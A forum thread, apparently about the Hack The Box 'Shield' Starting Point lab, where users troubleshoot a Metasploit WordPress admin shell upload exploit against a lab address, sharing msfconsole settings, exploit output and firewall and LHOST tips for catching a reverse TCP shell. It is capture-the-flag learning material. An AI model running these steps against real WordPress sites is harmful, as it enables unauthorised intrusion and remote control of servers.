Starting Point - Shield

Hi guys,
am stuck in a loop in the Sheild at the Starting point. am in between the last step of Wordpress where I can exploit Wordpress using ' msfconsole 'and beginning point of Netcat, it doesn't seem that I can upload nc.exe. If you've any advice here?
I've worked my way around msf by changing payloads types. but no meterpreter worked.
What else am missing.

Tagged:

Comments

  • edited April 5

    You might have downloaded the wrong netcat file... I used version 1.11 and it worked
    then just follow the walkthrough, it should work :smile:

  • Thanks for the replies guys. however, I think the issue is with msf. I can't get meterpreter prompt following the same steps.
    -------------Metasploit---------------
    msfconsole
    msf > use exploit/unix/webapp/wp_admin_shell_upload
    msf > set PASSWORD [email protected]!
    msf > set USERNAME admin
    msf > set TARGETURI /wordpress
    msf > set RHOSTS 10.10.10.29

    msf > run

    When I hit run. It returns
    -----------result-------
    [] Authenticating with WordPress using admin:[email protected]!...
    [+] Authenticated with WordPress
    [
    ] Preparing payload...
    [] Uploading payload...
    [
    ] Executing the payload at /wordpress/wp-content/plugins/nvCLEyQPUq/euQfJdmBzj.php...
    [!] This exploit may require manual cleanup of 'euQfJdmBzj.php' on the target
    [!] This exploit may require manual cleanup of 'nvCLEyQPUq.php' on the target
    [!] This exploit may require manual cleanup of '../nvCLEyQPUq' on the target
    [*] Exploit completed, but no session was created.

    msf5 exploit(unix/webapp/wp_admin_shell_upload) >

    so exploited completed, but no session so no meterpreter, is that normal at this point or I've got something wrong.

    plus one more issue. the lcd command doesn't work
    msf > lcd /home/username/Downloads

  • check your firewall and username is not real username

  • Type your comment> @anggabvmv said:

    check your firewall and username is not real username

    Many thanks man, captured the flag :)

  • Hi, I am new here and I do not know if I should open a new discussion or not, but this one is about exactly my problem.
    Could you give me one more hint about the "Exploit completed, but no session was created." situation? I could not divine what @anggabvmv said on April 7.

  • sysgh0st, Try 'set LHOST 10.10.14.xx' before 'run'. Where xx is your IP

  • Thanks for the tip. I'll try to explain how I solved in my case and hopefully, you'll be able to spawn the meterpreter shell.

    I started msfconsole as sudo, then, after typing in the exploit necessities, I added the above command from @astrocat .
    When I ran the exploit, it still gave me the error, but that is when I realized that from the line "[*] Started reverse TCP handler on 10.10.14.xx (the htb ip):4444", Metasploit was sending the signal back to port 4444, which I didn't personally allow yet from the firewall (which was enabled).
    I quickly added a rule to my firewall to allow from 10.10.10.29 proto tcp to any port 4444, and when I constructed the shell again, it worked!!!
    So, when @anggabvmv meant by "check firewall", I believe he meant us to create a door for the signal to come through. Hope this helps.

Sign In to comment.